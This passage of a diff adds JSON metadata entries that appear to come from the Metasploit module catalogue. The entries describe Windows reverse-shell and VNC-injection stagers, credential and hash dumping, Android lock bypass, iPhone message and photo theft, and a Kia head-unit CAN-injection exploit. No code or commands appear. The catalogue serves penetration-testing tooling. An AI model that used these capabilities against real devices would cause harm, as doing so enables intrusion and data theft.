"payload_windows/x64/shell/reverse_tcp_uuid": { + "name": "Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/reverse_tcp_uuid", + "check": false, + 
"post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_windows/x64/shell_bind_tcp": { + "name": "Windows x64 Command Shell, Bind TCP Inline", + "fullname": "payload/windows/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Listen for a connection and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/shell_reverse_tcp": { + "name": "Windows x64 Command Shell, Reverse TCP Inline", + "fullname": "payload/windows/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Connect back to attacker and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + 
"payload_windows/x64/vncinject/bind_ipv6_tcp": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/windows/x64/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_windows/x64/vncinject/bind_ipv6_tcp_uuid": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/windows/x64/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 
11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_windows/x64/vncinject/bind_named_pipe": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager", + "fullname": "payload/windows/x64/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "UserExistsError" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_windows/x64/vncinject/bind_tcp": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager", + "fullname": "payload/windows/x64/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Inject a 
VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_windows/x64/vncinject/bind_tcp_rc4": { + "name": "Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": 
"windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_windows/x64/vncinject/bind_tcp_uuid": { + "name": "Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_windows/x64/vncinject/reverse_http": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/x64/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_windows/x64/vncinject/reverse_https": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/x64/vncinject/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "agix", + "rwincey" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_windows/x64/vncinject/reverse_tcp": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager", + "fullname": "payload/windows/x64/vncinject/reverse_tcp", + "aliases": [], + 
"rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_windows/x64/vncinject/reverse_tcp_rc4": { + "name": "Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_windows/x64/vncinject/reverse_tcp_uuid": { + "name": "Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_windows/x64/vncinject/reverse_winhttp": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/windows/x64/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + 
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_windows/x64/vncinject/reverse_winhttps": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/windows/x64/vncinject/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "post_aix/hashdump": { + 
"name": "AIX Gather Dump Password Hashes", + "fullname": "post/aix/hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "Post module to dump the password hashes for all users on an AIX system.", + "references": [], + "platform": "AIX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-26 16:28:15 +0000", + "path": "/modules/post/aix/hashdump.rb", + "is_install_path": true, + "ref_name": "aix/hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_android/capture/screen": { + "name": "Android Screen Capture", + "fullname": "post/android/capture/screen", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "timwr" + ], + "description": "This module takes a screenshot of the target phone.", + "references": [], + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 01:56:49 +0000", + "path": "/modules/post/android/capture/screen.rb", + "is_install_path": true, + "ref_name": "android/capture/screen", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_android/gather/hashdump": { + "name": "Android Gather Dump Password Hashes for Android Systems", + "fullname": "post/android/gather/hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die", + "timwr" + ], + "description": "Post 
Module to dump the password hashes for Android System. Root is required.\n To perform this operation, two things are needed. First, a password.key file\n is required as this contains the hash but no salt. Next, a sqlite3 database\n is needed (with supporting files) to pull the salt from. Combined, this\n creates the hash we need. Samsung based devices change the hash slightly.", + "references": [ + "URL-https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/", + "URL-https://hashcat.net/forum/thread-2202.html" + ], + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 01:56:49 +0000", + "path": "/modules/post/android/gather/hashdump.rb", + "is_install_path": true, + "ref_name": "android/gather/hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_android/gather/sub_info": { + "name": "Extract Subscriber Info", + "fullname": "post/android/gather/sub_info", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Auxilus" + ], + "description": "This module displays the subscriber info stored on the target phone.\n It uses call service to get values of each transaction code like IMEI, etc.", + "references": [], + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 01:56:49 +0000", + "path": "/modules/post/android/gather/sub_info.rb", + "is_install_path": true, + "ref_name": "android/gather/sub_info", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + 
"session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_android/gather/wireless_ap": { + "name": "Gather Wireless SSIDs and PSKs", + "fullname": "post/android/gather/wireless_ap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Auxilus", + "timwr" + ], + "description": "This module displays all wireless AP creds saved on the target device.", + "references": [], + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 01:56:49 +0000", + "path": "/modules/post/android/gather/wireless_ap.rb", + "is_install_path": true, + "ref_name": "android/gather/wireless_ap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_android/local/koffee": { + "name": "KOFFEE - Kia OFFensivE Exploit", + "fullname": "post/android/local/koffee", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-12-02", + "type": "post", + "author": [ + "Gianpiero Costantino", + "Ilaria Matteucci" + ], + "description": "This module exploits CVE-2020-8539, which is an arbitrary code execution vulnerability that allows an to\n attacker execute the micomd binary file on the head unit of Kia Motors. This module has been tested on\n SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software versions. 
This module, run on an\n active session, allows an attacker to send crafted micomd commands that allow the attacker to control the head\n unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle.", + "references": [ + "CVE-2020-8539", + "URL-https://sowhat.iit.cnr.it/pdf/IIT-20-2020.pdf" + ], + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/android/local/koffee.rb", + "is_install_path": true, + "ref_name": "android/local/koffee", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects", + "config-changes", + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "CAMERA_REVERSE_OFF", + "description": "It hides the parking camera video stream" + }, + { + "name": "CAMERA_REVERSE_ON", + "description": "It shows the parking camera video stream" + }, + { + "name": "CLUSTER_CHANGE_LANGUAGE", + "description": "It changes the cluster language" + }, + { + "name": "CLUSTER_RADIO_INFO", + "description": "It shows radio info in the instrument cluster " + }, + { + "name": "CLUSTER_RANDOM_NAVIGATION", + "description": "It shows navigation signals in the instrument cluster " + }, + { + "name": "CLUSTER_ROUNDABOUT_FARAWAY", + "description": "It shows a round about signal with variable distance in the instrument cluster " + }, + { + "name": "CLUSTER_SPEED_LIMIT", + "description": "It changes the speed limit shown in the instrument cluster" + }, + { + "name": "HIGH_SCREEN_BRIGHTNESS", + "description": "It increases the head unit screen brightness" + }, + { + "name": "INJECT_CUSTOM", + "description": "It injects custom micom payloads" + }, + { + "name": "LOW_FUEL_WARNING", + "description": "It pops up a low fuel message on the head 
unit" + }, + { + "name": "LOW_SCREEN_BRIGHTNESS", + "description": "It decreases the head unit screen brightness" + }, + { + "name": "MAX_RADIO_VOLUME", + "description": "It sets the radio volume to the max" + }, + { + "name": "NAVIGATION_FULL_SCREEN", + "description": "It pops up the navigation app window" + }, + { + "name": "REDUCE_RADIO_VOLUME", + "description": "It decreases the radio volume" + }, + { + "name": "SEEK_DOWN_SEARCH", + "description": "It triggers the seek down radio frequency search" + }, + { + "name": "SEEK_UP_SEARCH", + "description": "It triggers the seek up radio frequency search" + }, + { + "name": "SET_NAVIGATION_ADDRESS", + "description": "It pops up the navigation address window" + }, + { + "name": "SWITCH_OFF_HU", + "description": "It switches off the head unit" + }, + { + "name": "SWITCH_ON_HU", + "description": "It switches on the head unit" + }, + { + "name": "TOGGLE_RADIO_MUTE", + "description": "It mutes/umutes the radio" + } + ] + }, + "post_android/manage/remove_lock": { + "name": "Android Settings Remove Device Locks (4.0-4.3)", + "fullname": "post/android/manage/remove_lock", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-11", + "type": "post", + "author": [ + "CureSec", + "timwr" + ], + "description": "This module exploits a bug in the Android 4.0 to 4.3 com.android.settings.ChooseLockGeneric class.\n Any unprivileged app can exploit this vulnerability to remove the lockscreen.\n A logic flaw / design error exists in the settings application that allows an Intent from any\n application to clear the screen lock. 
The user may see that the Settings application has crashed,\n and the phone can then be unlocked by a swipe.\n This vulnerability was patched in Android 4.4.", + "references": [ + "CVE-2013-6271", + "URL-http://blog.curesec.com/article/blog/26.html", + "URL-http://www.curesec.com/data/advisories/Curesec-2013-1011.pdf" + ], + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 01:56:49 +0000", + "path": "/modules/post/android/manage/remove_lock.rb", + "is_install_path": true, + "ref_name": "android/manage/remove_lock", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "config-changes", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_android/manage/remove_lock_root": { + "name": "Android Root Remove Device Locks (root)", + "fullname": "post/android/manage/remove_lock_root", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "timwr" + ], + "description": "This module uses root privileges to remove the device lock.\n In some cases the original lock method will still be present but any key/gesture will\n unlock the device.", + "references": [], + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 01:56:49 +0000", + "path": "/modules/post/android/manage/remove_lock_root.rb", + "is_install_path": true, + "ref_name": "android/manage/remove_lock_root", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + 
"needs_cleanup": null, + "actions": [] + }, + "post_apple_ios/gather/ios_image_gather": { + "name": "iOS Image Gatherer", + "fullname": "post/apple_ios/gather/ios_image_gather", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Shelby Pace" + ], + "description": "This module collects images from iPhones.\n Module was tested on iOS 10.3.3 on an iPhone 5.", + "references": [], + "platform": "Apple_iOS", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 02:31:19 +0000", + "path": "/modules/post/apple_ios/gather/ios_image_gather.rb", + "is_install_path": true, + "ref_name": "apple_ios/gather/ios_image_gather", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_apple_ios/gather/ios_text_gather": { + "name": "iOS Text Gatherer", + "fullname": "post/apple_ios/gather/ios_text_gather", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Shelby Pace" + ], + "description": "This module collects text messages from iPhones.\n Tested on iOS 10.3.3 on an iPhone 5.", + "references": [], + "platform": "Apple_iOS", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 02:31:19 +0000", + "path": "/modules/post/apple_ios/gather/ios_text_gather.rb", + "is_install_path": true, + "ref_name": "apple_ios/gather/ios_text_gather", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_bsd/gather/hashdump": { + "name": "BSD Dump 
Password Hashes", + "fullname": "post/bsd/gather/hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bcoles " + ], + "description": "Post module to dump the password hashes for all users on a BSD system.", + "references": [], + "platform": "BSD", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 02:09:41 +0000", + "path": "/modules/post/bsd/gather/hashdump.rb", + "is_install_path": true, + "ref_name": "bsd/gather/hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_firefox/gather/cookies": { + "name": "Firefox Gather Cookies from Privileged JavaScript Shell", + "fullname": "post/firefox/gather/cookies", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-03-26", + "type": "post", + "author": [ + "joev " + ], + "description": "This module allows collection of cookies from a Firefox Privileged JavaScript Shell.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 21:39:18 +0000", + "path": "/modules/post/firefox/gather/cookies.rb", + "is_install_path": true, + "ref_name": "firefox/gather/cookies", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [], 